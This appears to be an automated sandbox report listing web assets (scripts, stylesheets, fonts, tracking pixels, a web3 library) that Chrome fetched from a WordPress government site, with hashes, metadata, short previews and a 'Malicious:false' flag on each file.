                                                                                                                        MD5:B2E38D9F526A427E5B51C362CBE1BB05
                                                                                                                        SHA1:9C05B0B0F7373499A2374EDD800C37AB9720CC88
                                                                                                                        SHA-256:CCAA2C4AB9F4B11A0FDA67379800DDC035BC72D466DC2D1C079B663DB45E8ABF
                                                                                                                        SHA-512:902E5B96BE8ED4853CB4055CA3895428D6FD30271591C639B55853FFEA7AB8B642BABFE24D68E6305F27746CFCFB5BA8409F768D1167DFAAAB043EAD361FAA0C
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:.PNG........IHDR.............<.q.....IDATx...w...U...9o..rUWwW.0.=.ar.4.Q.%D.H.D...`.6.....cl..?a..(.....&......+.o8........8`..k..{......<./=.....K./=.....K./=.......p...U!....RF.:.F..J.P.+K.0.!.t.#p.....(.3.qA....P&..+K.._r.K........J...6Q..'.[PeSI.p.-*q[@..FJ*.(.b.....8.tVZ:%........P..F.sZ.e..3\.}...Q......=....X..<n...C.:.'...)....#P.t.F3...1..I-....HXIFT%hP....*..A....Z. ..]..:.._..W..-..Vu+[2..j.W....b.]^.e.p.-.K&..Q.._X5_...H'.....2T...J.p.;....iZ..H..M4f*......Mb....x....B#.Q...Bk....u..m.e}.0..H......QBQ..@9....|..r.......\^;S........sB.....1g...\RV.G.q.})..w....J..XU..0V.eh.O.....-..w...T;'ob.....$....fP%...P..X.DA....dM...*.F.HI....H.......~.J.#.B8....0Rkb..J.5=.{W...pa.8..r..^j/.g/v..a..O.L=.ryI.A.._\._...E..{J...d\..Jp{..W.i...M..M.....M....Pe.8....~Y......G B.&G.IiK..zy.#,.I.I.b:E.D..t.Y.C.)J....i4N%...@8.v.%.TH.,.E)..H....)q.d%_bv.(.]}....Doq...n.....Gt..).l..._./......8..Xmv.yu......7....g.=r..A.+S..%.!}S........8T..X.;._;.R.2
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):43
                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                        MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                        SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                        SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                        SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://mc.yandex.com/sync_cookie_image_decide?token=10611.fH1OoSXDiCxpBQsjNz70vRcfoRCKnV72el8MOyZYUCNzPInswMVnZDixWZGJbZzcYCAPwYpj7I7oMEJSzlmlYQitO10RILaai2SvrMOULwtXGJey34xqsHUZbXqM2IFP8_R0NmA-LVPKkiCHFbb3UOiiVBU70YuNH0QeJGVsn8wIEyFktKtOCKdV6q2ne-bgGW8rqnWWD7Oz0Wepdc5Mf7W_6AMFUHHic0BLUHtJKnI%2C.6n504nlTozvgH4AdcQ2ltdTO0ZU%2C
                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (2991)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3026
                                                                                                                        Entropy (8bit):5.173280130609205
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:Q7A9/XN5NjJE2aAOuRicUKfTGwAuw5BJmVhl2qFqyvQyOw835uuPkSEwVYql+9y7:9314Of1AJ5m/FqyLn8pu4Zl+9y5It4yW
                                                                                                                        MD5:E4A49DF71F8B98C1D9F9D8FCE74D89E8
                                                                                                                        SHA1:B95FCDA0C8C26305AD94E80343D0CFCA8A048A10
                                                                                                                        SHA-256:9D4687A19CAB8F7442A3BDA40C45BE4D10E42488E091DDD706C3CAED83C3EE1F
                                                                                                                        SHA-512:42CD5F854779886F24C43ED14617380110C946D1B430B454060C3B391DE6FBAE6D0ED8AB7CDD7CFDC9726B2D6142A4E01C4448E36088DFCEE7FDD00B60909F89
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*! This file is auto-generated */.window.addComment=function(v){var I,C,h,E=v.document,b={commentReplyClass:"comment-reply-link",commentReplyTitleId:"reply-title",cancelReplyId:"cancel-comment-reply-link",commentFormId:"commentform",temporaryFormId:"wp-temp-form-div",parentIdFieldId:"comment_parent",postIdFieldId:"comment_post_ID"},e=v.MutationObserver||v.WebKitMutationObserver||v.MozMutationObserver,r="querySelector"in E&&"addEventListener"in v,n=!!E.documentElement.dataset;function t(){d(),e&&new e(o).observe(E.body,{childList:!0,subtree:!0})}function d(e){if(r&&(I=g(b.cancelReplyId),C=g(b.commentFormId),I)){I.addEventListener("touchstart",l),I.addEventListener("click",l);function t(e){if((e.metaKey||e.ctrlKey)&&13===e.keyCode&&"a"!==E.activeElement.tagName.toLowerCase())return C.removeEventListener("keydown",t),e.preventDefault(),C.submit.click(),!1}C&&C.addEventListener("keydown",t);for(var n,d=function(e){var t=b.commentReplyClass;e&&e.childNodes||(e=E);e=E.getElementsByClassName
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):133831
                                                                                                                        Entropy (8bit):4.724681605126616
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:nY9Y9NhPUbjdfUEU9G8pERl+qPoLydAuwc1wqYg/6mg:naYqbjdfnU95Cj+qgLyeiB6mg
                                                                                                                        MD5:2894ECA7BFABCC213ABD99FAD1BA57A5
                                                                                                                        SHA1:5E40DA62A03948824F016853B86DA7410CC59B51
                                                                                                                        SHA-256:B3E12BC4AD925362FBC89483771CFF0CB833FF052DE29DB0E124CA89CD5683C3
                                                                                                                        SHA-512:29456A4C08EAFAFB447B5235D4D9D0CB943600B99CDC0E1DAFD8FA9434112CCAF2A93E00718BFA745C8225BD49AA43CAF50E5F4158EF3C8B91396F86382ECA4E
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/* globals jQuery, mfn */./* jshint esversion: 6 */../**. * query loop masonry - prevents error with init in iframe. */..function queryLoopMasonry() {. jQuery('.mfn-query-loop-masonry').each(function() {.. let $masonry = jQuery(this);.. $masonry.imagesLoaded(function() {.. $masonry.isotope({. itemSelector: '.mfn-queryloop-item-wrapper',. layoutMode: 'masonry',. isOriginLeft: jQuery('body').hasClass('rtl') ? false : true. });.. $masonry.addClass('mfn-initialized');.. });.. });.}..(function($) {.. "use strict";.. var scrollTicker, lightboxAttr, sidebar,. rtl = $('body').hasClass('rtl'),. simple = $('body').hasClass('style-simple'),. isBlocks = $('body').hasClass('builder-blocks'),. topBarTop = '0',. headerH = 0,. currWidth = $(window).width(),. newWidth = $(window).width(),. screen = 'desktop',. mobileInitW = mfn.mobileInit ? mfn.mobileInit : 1240;.. /**. * Lightbox | Magnific Popup. */.. if ( ! mfn.lightbo
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (1432)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):1540
                                                                                                                        Entropy (8bit):5.112255512062075
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:zXAkLOB0pCXKBgHKfiVfNgnKBggKfiVfNU:zxQ3JHoJga
                                                                                                                        MD5:78A582571F88D7D9D7443423712E80B2
                                                                                                                        SHA1:53B9B049DA924B291C9BC7F988EBB46F6A9CC227
                                                                                                                        SHA-256:C24A7908E8BCCFB36947DE91AB342F33F1C966B31F50ED1FB83D9D8B3D579A1F
                                                                                                                        SHA-512:BA52A08F030DAA609543CC3528BA87B2F65CBC1E20C4133DAF060E17518FC7B1AA87DD37B470984E91DBB44DF6521C09DB76B8C5BDFA774B01B3046A937C023B
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/enllax.min.js?ver=27.0.7
                                                                                                                        Preview:/**. * Parallax. * enllax.js. * 1.1.0 | copyright 2015, MMK Jony | https://github.com/mmkjony/enllax.js. */.!function(t){"use strict";t.fn.enllax=function(r){var a=t(window).height(),n=t(document).height(),o=t.extend({ratio:0,type:"background",direction:"vertical"},r),e=t("[data-enllax-ratio]");e.each(function(){var r,e,s,i=t(this),c=i.offset().top,l=i.outerHeight(),p=i.data("enllax-ratio"),d=i.data("enllax-type"),x=i.data("enllax-direction");r=p?p:o.ratio,e=d?d:o.type,s=x?x:o.direction;var f=Math.round(c*r),u=Math.round((c-a/2+l)*r);"background"==e?"vertical"==s?i.css({"background-position":"center "+-f+"px"}):"horizontal"==s&&i.css({"background-position":-f+"px center"}):"foreground"==e&&("vertical"==s?i.css({"-webkit-transform":"translateY("+u+"px)","-moz-transform":"translateY("+u+"px)",transform:"translateY("+u+"px)"}):"horizontal"==s&&i.css({"-webkit-transform":"translateX("+u+"px)","-moz-transform":"translateX("+u+"px)",transform:"translateX("+u+"px)"})),t(window).on("scroll",fu
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (612)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):64888
                                                                                                                        Entropy (8bit):5.139444759757301
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:7DexKEQTOpatS9hWWGZFp/jBFLJlzywRE/3S9HsgIG7Ui:5E2OpatS9hWWyNLOIsOIi
                                                                                                                        MD5:DB202190BE27C7F16CEF7392140B118F
                                                                                                                        SHA1:961FB0911C229800FED9A4F571EE058751079601
                                                                                                                        SHA-256:6E877087079D33A9F0DDCDECFB6698825F124046ECADF2D5ED6DAFD0F5FB8C93
                                                                                                                        SHA-512:CC1EA492D759F0885D69F1A797CC54BF65893A8FC2D4E1225F3AAC2A5B1EE2C0B9E9AF25469E67B26A0C11B31509D597CAACD20FE38077ADFAC8FEE1A5CC4B54
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/css/responsive.css?ver=27.0.7
                                                                                                                        Preview:body {. --mfn-tabs-border-width: 1px;.}..html,body{overflow-x:hidden}../* > 1240 ------------------------------------------------------------------------------------------------------------- > 1240 */..@media only screen and (min-width: 1240px).{...layout-boxed{padding:25px}...layout-boxed.boxed-no-margin{padding:0;}..#Top_bar.loading{display:none}....hover_color:hover .hover_color_bg,.hover_color.hover .hover_color_bg{background-color:inherit!important;border-color:inherit!important}.}.../* #Header Creative always Open.1240 - 1489 ----------------------------------------- #Header Creative always Open 1240 - 1489 */..@media only screen and (min-width: 1240px) and (max-width: 1489px).{..body.header-open{min-width:0;}...header-open #Wrapper{max-width:960px;}....header-open .section_wrapper,...header-open .container,...header-open.with_aside .content_wrapper{max-width:940px;}....header-open.with_aside .section_wrapper{max-width:100%;}.../* -------------------- */.../* Error 404 */...he
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 52648, version 1.0
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):52648
                                                                                                                        Entropy (8bit):7.996033428788516
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:1536:9eBlxzWRUJTVGP5v267Q1Sk+S2/D8l+8O2:9maeeP5v267Q7w8z
                                                                                                                        MD5:657E828FB3A5963706E24CBF9D711BB8
                                                                                                                        SHA1:84C08557D977E0A46EC8941B2D84235069DAB229
                                                                                                                        SHA-256:45E39853C41558C4922FF1B0895547A99E378F136EC3D9D2F4DF15CC269485FA
                                                                                                                        SHA-512:EEBEDF24A2516B860FFA2C9241474157604F8FC2EDC9E3BF3C0A0DDDF3168519F13FC195D48D232ED8F4A5DB1C48EF0563D62B2E2BDCF55F936CBD319AB18E16
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://use.fontawesome.com/releases/v5.0.0/webfonts/fa-brands-400.woff2
                                                                                                                        Preview:wOF2.............r....V.........................T.V..f...h..X.6.$..|..... ..*..m[.#qB.......*...v......@(B...............1......T+.....d.2OaAf.j.....b.>.........?2|/F...PR*J4[ &..b....E......../...q..4`M*D.c...-|.a.q.b..h..m..4....... ..N...?B....k.?.Ja.F7=....u|....zx..z..L.....ht......:w.-.P..!...Yh..q.=..'aP[........ .d.u......D65...,.HD.6..........8..4...(...V.........Q..../...8@.+J.B*..I.L........N...sn.n............&.5.rC0.nc,.X...".0r......D.."*F.6........b..._.....q$.c.[.y......../.0..#..$,.?..P......_...J..&...).c^.do...;~.....^...K...........7.[...BN..I.o.8.....{.....K.I#....~w._[e..... ..C@.n*.qd.....]T..Im.....';...."Y.,S$.I.N...6....m.!...;...2.m9E.\..d.=.W...{...S.#...y$T...]G...Bdp^.#.B....@a];.Q}....._.f..Y.I-....!9...].F/a.[.^..0..VMw..@..]...[.......-.~....U..)m....fc..N..-..iI.l]........u.{..k.y....+)X-.+p.V<.19.q.u8...T....n"..u....~..lIj.\..l....Pa$.$....i.....4%.....k.....e...\l9d..d...R.ij..NHRP:..>...s`.|
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):43
                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                        MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                        SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                        SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                        SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):57
                                                                                                                        Entropy (8bit):4.782463646078298
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:GRPbuAaEwbFSR5FW0A:GRPyZFFohA
                                                                                                                        MD5:7C5266FE1D1632AFDA41664FFF340656
                                                                                                                        SHA1:15E6BBB7E7D1E51F56083D48A0722CCCFD5C35DE
                                                                                                                        SHA-256:BCA11CECC68819D46D0A97A7599D87317CA9859ABC0202623E91D414EB69C7B1
                                                                                                                        SHA-512:AB76C7F50490B7E656DA277F3494C15FE2DE1CAA030B170491CAB982D402E3CB8D42E0297BDDEA2A1D9F89438A5180E55D2A408878652D1FD8D522CE47E46513
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/uploads/so-css/so-css-betheme.css?ver=1707433542
                                                                                                                        Preview:body:not(.template-slider) #Header {.. height: 350px;..}
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (11829)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):12008
                                                                                                                        Entropy (8bit):5.0612453170624585
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Xrc1LBgbn4qedz6jylwFVOMKh1EIpPoGEmvZCp8SW:XrRz4MTnIppCpFW
                                                                                                                        MD5:2509EFF245DD9849B80DA96D6B0446AD
                                                                                                                        SHA1:AA7EF2178E87A52ECD4C10BE3FF09EBE702EB516
                                                                                                                        SHA-256:A1AC109FB0DA76A03EB39DAECB548806675CDA9793AD6BCE4621C651746DE08F
                                                                                                                        SHA-512:7A1EDD5BA4FE790CC72BB014839B079A84E6EE95F7540A81D6AECF60C289E13C0F7B02BF325B12472249508EB068214E91A795FA942787C5C57528D9451C0D09
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*!. * jQuery UI Tabs 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery","../keycode","../safe-active-element","../unique-id","../version","../widget"],t):t(jQuery)}(function(l){"use strict";var a;return l.widget("ui.tabs",{version:"1.13.3",delay:300,options:{active:null,classes:{"ui-tabs":"ui-corner-all","ui-tabs-nav":"ui-corner-all","ui-tabs-panel":"ui-corner-bottom","ui-tabs-tab":"ui-corner-top"},collapsible:!1,event:"click",heightStyle:"content",hide:null,show:null,activate:null,beforeActivate:null,beforeLoad:null,load:null},_isLocal:(a=/#.*$/,function(t){var e=t.href.replace(a,""),i=location.href.replace(a,"");try{e=decodeURIComponent(e)}catch(t){}try{i=decodeURIComponent(i)}catch(t){}return 1<t.hash.length&&e===i}),_create:function(){var e=this,t=this.options;this.running=!1,this._addClass("ui-ta
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (583)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):5498
                                                                                                                        Entropy (8bit):5.847347848435852
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:kSsqdYuSji3KaTa1aOaiacarHZaXacaQj2X61av2HkF77wD8uOTe9:vsEYunOD1av2HjwuOk
                                                                                                                        MD5:D2BB3AE594ACE88EF30EE3829D83F360
                                                                                                                        SHA1:88FA158D7F7C72D86EFD52A5C16931A14C43E3F2
                                                                                                                        SHA-256:481BE5E07D25ACC99546733A64F75D59AA6F347C2BC3CCC6233FCAF3EBFFBDFE
                                                                                                                        SHA-512:0365D2DF7BED810ECA3059D5E7BBF784EDA7B6B88F5C0532BA1A7056F2FCD3C4447A4CBB0FAE818B12D32583916AC7DE8D9FF7DE4D53E5BCA7FCA6945F7DEDD9
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://mc.yandex.com/metrika/metrika_match.html
                                                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">. <meta name="viewport" content="width=device-width,initial-scale=1">. <style>body {background-color:#EFF2F7;font-family:system-ui,sans-serif;color:#2F3746;}.main{display:flex;flex-direction:column;align-items:center;}button {background-color:#7A45E5;border-radius:14px;cursor:pointer;color:white;border:0;padding:16px 20px;}button:hover {background-color:#8659e0;}h1{font-size:140px;white-space:nowrap;}h3{font-size:32px;text-align:center;}p{max-width:600px;line-height:24px;text-align:center;margin-bottom:32px;}@media (prefers-color-scheme: dark) {body {background-color:#333;color:white;}}@media (max-width: 650px) {h1 {font-size: 60px;}}</style>.</head>.<body>. <div class="main">. <h1 aria-hidden="true">.\_(.)_/.</h1>. <h3>Something
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (1572)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):56767
                                                                                                                        Entropy (8bit):5.256156642585067
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:U1TMrE8Vj7flDYVLaNLf/pUWJELXN+Ci+KhOoJUaRbn07Un9JhaEqOrELg2Jaa7G:UBilp87Gb4MV
                                                                                                                        MD5:15426D133FC070991F9E9AD394279C2E
                                                                                                                        SHA1:0CDC8B7691B8A7F07C422BBF335F6E08B57A0361
                                                                                                                        SHA-256:DB21FF96F7EB44C55AC52550F68F3165FED98487174695BBC904C9B9860D02E2
                                                                                                                        SHA-512:C1D0D7DE286911EABF7E81F826DF4EE2FAD8AB675FE3E82C7E3BAAB07F5C4D4739BB4C8AFEF27BF91B1B9B2D7074CB7A23BB3FCF46A5077F8624A8FEAD52747A
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://fonts.googleapis.com/css?family=Roboto%3A1%2C300%2C400%2C400italic%2C500%2C700%2C700italic%7CLora%3A1%2C300%2C400%2C400italic%2C500%2C700%2C700italic&display=swap&ver=6.7.1
                                                                                                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Lora';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LLPtLp_A.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Lora';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LJftLp_A.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* math */.@font-face {. font-family: 'Lora';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LXftLp_A.woff2) format('woff2');. unicode-range: U+0302-0303, U+0305, U+0307-0308, U+0310, U+0312, U+0315, U+031A, U+0326-0327, U+032C, U+032F-0330, U+0332-0333, U+0338, U+033A, U+0346, U+034D, U+0391-03A1, U+03A3-03A9, U+03B1-03C9,
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (1732)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1830
                                                                                                                        Entropy (8bit):5.016598452784215
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:bcxbor721bordKIEKmPc/mPRKmPrG/mPfKmPEMy4XQUdbz:qbor7obordk
                                                                                                                        MD5:2FCD6F71A7127832A97B771A9FE5482B
                                                                                                                        SHA1:61643E25A6FC0B2B5CD3315D100970053DB45D20
                                                                                                                        SHA-256:AEAE8BA7D9C8EE997A8DDB5F5EC82381ED7851B750E4D1F466A1F19FAD7A8462
                                                                                                                        SHA-512:FF8FF5EA489ED8C258F5161863C86911A1B5AEC86FC848AEE5D95FAB9EB69262F057E58EAAF2A9CEF804998CB8FA46206E399C542CCBFCFED00765FDB70173B3
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/**. * Animations v1.4. * Copyright 2014, Joe Mottershaw, https://github.com/joemottershaw/. */..function animateElement(){jQuery(".animate").each(jQuery(window).width()>=96?function(a,n){var n=jQuery(n),i=jQuery(this).attr("data-anim-type"),t=jQuery(this).attr("data-anim-delay");n.visible(!0)&&setTimeout(function(){n.addClass(i)},t)}:function(a,n){var n=jQuery(n),i=jQuery(this).attr("data-anim-type"),t=jQuery(this).attr("data-anim-delay");setTimeout(function(){n.addClass(i)},t)})}function randomClass(){var a=Math.ceil(Math.random()*classAmount);return classesArray[a]}function animateOnce(a,n){"random"==n&&(n=randomClass()),jQuery(a).removeClass("trigger infinite "+triggerClasses).addClass("trigger").addClass(n).one("webkitAnimationEnd oAnimationEnd MSAnimationEnd animationend",function(){jQuery(this).removeClass("trigger infinite "+triggerClasses)})}function animateInfinite(a,n){"random"==n&&(n=randomClass()),jQuery(a).removeClass("trigger infinite "+triggerClasses).addClass("trigger
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):2894
                                                                                                                        Entropy (8bit):5.130108035080603
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:HrjSTxswDB/P7LUS0BvpKkR2/HSXmpgMPnfFrYHe1rcYlX3orrkdEv4Hm6Hid:HC+2/Vpb/flue1pFdEv4Hmo0
                                                                                                                        MD5:3FD2AFA98866679439097F4AB102FE0A
                                                                                                                        SHA1:DBC9C4139E49D0D9FB41B7191AAD1A2DB6C555FD
                                                                                                                        SHA-256:CCD31FFA708D025833F954B3E0560CEDD58DF9A0D2706B2CCEE5F501C5B2467B
                                                                                                                        SHA-512:82811EF42ABD80CBEBD4A74D35475FC3871478FC25A486B08BB7E04921B7824DB56C56B2191E9AB56A421552B483A2E64F966396711E5F248AFAE9D1DED22CB2
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0.2
                                                                                                                        Preview:.wpcf7 .screen-reader-response {..position: absolute;..overflow: hidden;..clip: rect(1px, 1px, 1px, 1px);..clip-path: inset(50%);..height: 1px;..width: 1px;..margin: -1px;..padding: 0;..border: 0;..word-wrap: normal !important;.}...wpcf7 form .wpcf7-response-output {..margin: 2em 0.5em 1em;..padding: 0.2em 1em;..border: 2px solid #00a0d2; /* Blue */.}...wpcf7 form.init .wpcf7-response-output,..wpcf7 form.resetting .wpcf7-response-output,..wpcf7 form.submitting .wpcf7-response-output {..display: none;.}...wpcf7 form.sent .wpcf7-response-output {..border-color: #46b450; /* Green */.}...wpcf7 form.failed .wpcf7-response-output,..wpcf7 form.aborted .wpcf7-response-output {..border-color: #dc3232; /* Red */.}...wpcf7 form.spam .wpcf7-response-output {..border-color: #f56e28; /* Orange */.}...wpcf7 form.invalid .wpcf7-response-output,..wpcf7 form.unaccepted .wpcf7-response-output,..wpcf7 form.payment-required .wpcf7-response-output {..border-color: #ffb900; /* Yellow */.}...wpcf7-form-contro
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (65470)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):642428
                                                                                                                        Entropy (8bit):5.534481975660463
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:iNajiG1YOdqCibdPB8c118X1Unf9F9CvU9sT6Q479FwwQPvi6naRq3A7Hpa:ic+skHYW79FlDpa
                                                                                                                        MD5:CE5BD54ADE787E3757D0D32FF267280A
                                                                                                                        SHA1:33DAA933561E55F9988E2BE25448078F97EF0DB2
                                                                                                                        SHA-256:F03340295D792ADB763C777EAA96039AA831C2402BD7CBC970DB44931FA736B8
                                                                                                                        SHA-512:11CA21748CD36A3EE4BCFD3298CDD188AC5A9EF7F01AF8ECAE6A2E15139E2DBB485CD5E04010D479EEB0ADFECBE1B8304A25C66512E2D8094390E4385AB08A62
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js
                                                                                                                        Preview:/*! For license information please see web3.min.js.LICENSE.txt */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.Web3=t():e.Web3=t()}(this,(()=>(()=>{var e={1166:(e,t)=>{"use strict";function r(e){if(Array.isArray(e)){const t=[];let n=0;for(let i=0;i<e.length;i++){const o=r(e[i]);t.push(o),n+=o.length}return h(o(n,192),...t)}const t=g(e);return 1===t.length&&t[0]<128?t:h(o(t.length,128),t)}function n(e,t,r){if(r>e.length)throw new Error("invalid RLP (safeSlice): end slice of Uint8Array out-of-bounds");return e.slice(t,r)}function i(e){if(0===e[0])throw new Error("invalid RLP: extra zeros");return d(u(e))}function o(e,t){if(e<56)return Uint8Array.from([e+t]);const r=p(e),n=p(t+55+r.length/2);return Uint8Array.from(l(n+r))}function s(e,t=!1){if(null==e||0===e.length)return Uint8Array.from([]);const r=a(g(e));if(t)return r;if(0!==r.remainder.length)throw new Error("inva
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (11829)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):12008
                                                                                                                        Entropy (8bit):5.0612453170624585
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Xrc1LBgbn4qedz6jylwFVOMKh1EIpPoGEmvZCp8SW:XrRz4MTnIppCpFW
                                                                                                                        MD5:2509EFF245DD9849B80DA96D6B0446AD
                                                                                                                        SHA1:AA7EF2178E87A52ECD4C10BE3FF09EBE702EB516
                                                                                                                        SHA-256:A1AC109FB0DA76A03EB39DAECB548806675CDA9793AD6BCE4621C651746DE08F
                                                                                                                        SHA-512:7A1EDD5BA4FE790CC72BB014839B079A84E6EE95F7540A81D6AECF60C289E13C0F7B02BF325B12472249508EB068214E91A795FA942787C5C57528D9451C0D09
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.3
